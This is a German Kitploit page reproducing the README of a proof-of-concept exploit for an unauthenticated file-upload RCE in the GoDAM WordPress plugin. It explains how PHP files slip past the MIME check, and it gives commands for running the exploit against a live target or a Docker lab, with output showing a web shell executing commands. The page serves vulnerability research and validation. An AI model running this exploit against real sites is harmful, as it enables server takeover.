Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-14282 — GoDAM WordPress-Plugin <= 1.12.2 – nicht authentifizierter Datei-Upload RCE (CVE-2026-14282) | Kitploit
Tools/GitHubGitHub/nullwhisper/cve-2026-14282
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLabs & Praxis
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

GoDAM WordPress-Plugin <= 1.12.2 – nicht authentifizierter Datei-Upload RCE (CVE-2026-14282)

Repository anzeigen
12vor 29 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-14282 — GoDAM WordPress Plugin <= 1.12.2 Nicht authentifizierter Datei-Upload -> RCE

Autor: nullwhisper
Verwendungszweck: nur für autorisierte Sicherheitsforschung / Schwachstellenvalidierung.

Was ist das?

Die GoDAM-WordPress-Plugin-Versionen <= 1.12.2 registrieren ein WPForms-Feld namens godam_record. Der Upload-Handler save_video_file() ist an die öffentliche Aktion wpforms_process_before_filter gebunden und wird daher vor jeder Authentifizierungsprüfung ausgeführt. Der Handler vertraut dem vom Angreifer kontrollierten Content-Type-Header, akzeptiert eine PHP-Datei, solange der MIME-Typ mit video/ beginnt, und verschiebt sie in das vom Webserver ausgelieferte Verzeichnis wp-content/uploads/godam/wpforms/. Dadurch kann ein nicht authentifizierter Angreifer beliebigen PHP-Code hochladen und ausführen.

  • CVE: CVE-2026-14282
  • Produkt: GoDAM WordPress plugin
  • Betroffen: <= 1.12.2
  • Behoben: 2.0.0
  • Typ: Nicht authentifizierter beliebiger Datei-Upload, der zu RCE führt
  • CVSS: 9.8 (Kritisch)
  • Referenzen

    • IONIX-Advisory: https://www.ionix.io/threat-center/cve-2026-14282/
    • CVE-Eintrag: https://www.cve.org/CVERecord?id=CVE-2026-14282
    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14282
    • WordPress.org-Plugin-Seite: https://wordpress.org/plugins/godam/

    Dateien

    root@kitploit:~
    .
    ├── cve_2026_14282_poc.py   # Main PoC
    ├── lab/
    │   ├── docker-compose.yml  # WordPress lab
    │   └── setup.php           # Creates a WPForms form with GoDAM field
    ├── requirements.txt
    └── README.md
    

    Installation

    root@kitploit:~
    pip3 install -r requirements.txt
    

    Verwendung

    Live-Ziel

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u https://target.com/page-with-form
    

    Das Skript erkennt die WPForms-Formular-ID und die GoDAM-Feld-ID automatisch. Wenn die Seite mehrere Formulare enthält oder die Erkennung fehlschlägt, verwende:

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
        --form-id 4 --field-id 1 --cmd "whoami"
    

    Lokales Labor

    1. Lade die verwundbaren Plugins herunter (gib die Binärdateien nicht weiter):

      root@kitploit:~
      mkdir -p lab/wpforms-lite lab/godam
      cd lab/wpforms-lite
      wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
      unzip wpforms-lite.latest-stable.zip
      rm wpforms-lite.latest-stable.zip
      cd ../godam
      wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
      unzip godam.1.12.2.zip
      rm godam.1.12.2.zip
      cd ../..
      
    2. Starte das Labor:

      root@kitploit:~
      cd lab
      docker compose up -d
      
    3. Schließe den WordPress-Installer unter http://127.0.0.1:8092 ab.

    4. Installiere und aktiviere die Plugins und erstelle dann das Formular und die Testseite:

      root@kitploit:~
      docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
      docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
      docker exec -i lab-wpcli-1 php /tmp/setup.php
      
    5. Führe den PoC aus:

      root@kitploit:~
      python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
      

    Auf localhost verifiziert

    Getestet mit WordPress 6.8 + WPForms Lite (aktuellste Version) + GoDAM 1.12.2.

    root@kitploit:~
    [*] Detecting WPForms form and GoDAM field...
    [*] Found form ID 4, GoDAM field(s): 1
    [*] Trying upload via field 1...
    [+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
    [+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
    [*] Command output:
    GODAM-RCE-Linux ... PWNED
    

    Warum die Plugin-Binärdateien nicht enthalten sind

    Dieses Repository enthält nur den PoC und die Orchestrierungsdateien für das Labor. Die verwundbaren Plugin-Binärdateien sind nicht enthalten, um Bloat und Verteilungsprobleme zu vermeiden. Lade die jeweiligen verwundbaren Versionen für dein eigenes Labor von WordPress.org herunter.

    Haftungsausschluss

    Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Forschungszwecke bestimmt. Verwende es nicht gegen Systeme, die dir nicht gehören oder für die du keine ausdrückliche Erlaubnis zum Testen hast. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diesen Code verursacht werden.

    Tool herunterladen